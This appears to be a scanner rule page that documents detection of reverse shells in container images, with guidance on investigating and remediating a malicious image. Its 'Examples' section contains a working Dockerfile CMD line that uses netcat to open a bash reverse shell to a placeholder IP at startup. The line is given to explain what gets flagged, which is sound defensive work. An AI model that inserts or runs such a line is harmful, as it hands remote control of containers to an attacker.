Reverse Shell in Container Image

ID

reverse_shell

Severity

critical

Family

Malicious Image

Tags

dockerfile, malware, reachable, security, supply-chain

Description

A reverse shell was found in the container image, either in the source code, or in the CMD or ENTRYPOINT scripts.

Reverse shells are a common technique to bypass firewalls and NAT devices, and gives the attacker remote execution in the system running the image. The connection could be used to gain persistence, to move laterally to other systems available from the malicious image, to install additional malware, or to exfiltrate sensitive data such as credentials reachable from the image.

Security

A reverse shell is, under normal circumstances, a clear sign of malicious behavior in the image.

If the image is owned by the organization, an investigation is recommended to check who altered the Dockerfile or deployed the image, and how the malicious code was introduced. Your organization can be targeted in a software supply chain attack !

Examples

# This command opens at startup a reverse shell
# in any container running this image
CMD [ "nc", "-c", "/bin/bash", "1.2.3.4", "80" ]

Mitigation / Fix

When your organization owns the image:

  1. Immediate Actions:

    • Stop and remove all running containers using this image.

    • Immediately remove/quarantine the image from your registry.

    • Alert relevant teams (Security, DevOps, Development).

    • Document initial findings and preserve evidence.

  2. Investigation:

    • Check image scanning logs and vulnerability reports

    • Review build pipeline logs and source code

    • Identify how and when the malicious code was introduced

    • Determine if other images/systems were compromised

    • Analyze any suspicious network activity from affected containers

    • Notify stakeholders if the image was compromised by a security breach, including regulatory authorities and law enforcement.

  3. Remediation:

    • Clean or rebuild the image from verified source code

    • Review and strengthen CI/CD pipeline security

    • Update access controls and signing requirements

    • Implement additional security scanning if needed

    • Check backup images for contamination

    • Pin references to images using SHA instead of tags.

If this is a third-party image:

  1. Immediate Actions:

    • Stop and remove all containers running the malicious image

    • Block the image in your container security policies

    • Document the incident and preserve evidence

    • Notify your security team

  2. External Communication:

    • Report the malicious image to the registry provider (Docker Hub, GitHub, etc.)

    • Alert the image maintainer/owner if possible

    • Consider notifying relevant security organizations (CERT, CISA, ENISA…​)

    • Share IOCs with trusted industry partners

  3. Internal Changes:

    • Find and validate an alternative image or vendor

    • Update deployment configurations to use safe alternatives

    • Review and possibly enhance container security policies

    • Strengthen third-party image verification processes

    • Consider maintaining local copies of verified third-party images

    • Pin references to images using SHA instead of tags.